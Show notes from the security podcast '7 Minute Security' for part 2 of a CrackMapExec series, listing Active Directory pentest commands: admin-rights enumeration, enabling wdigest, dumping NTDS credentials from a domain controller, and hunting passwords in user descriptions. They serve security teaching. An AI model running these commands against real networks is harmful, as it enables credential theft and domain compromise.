Preview Mode Links will not work in preview mode

7 Minute Security

Mar 10, 2023

Hey friends, today we're covering part 2 of our series all about cracking and mapping and execing with CrackMapExec. Specifically we cover:

# Enumerate where your user has local admin rights: cme smb x.x.x.x/24 -u user -p password  # Set wdigest flag: cme smb x.x.x.x -u user -p password -M wdigest -o ACTION=enable  # Dump AD creds: cme smb IP.OF.DOMAIN.CONTROLLER -u user -p password --ntds --enabled  # Clean up AD dump output: cat /path/to/file.ntds | grep -iv disabled | cut -d ':' -f1,4 | grep -v '\$' | sort  # Check ms-ds-machineaccountquota: cme ldap x.x.x.x -u user -p password -M maq  # Check for Active Directory Certificate Services: cme ldap x.x.x.x -u user -p password -M adcs  # Pull all AD user descriptions: cme ldap x.x.x.x -u user -p password -M get-desc-users  # Pull all AD user descriptions down to a file and search for users with "pass" in description: cme ldap x.x.x.x -u user -p password -M user-desc  # CrackMapExec database (CME)  ## Clear database sudo rm -r ~/.cme  ## Handy commands inside the cmedb prompt: hosts shares creds export shares detailed shares.csv export creds detailed creds.txt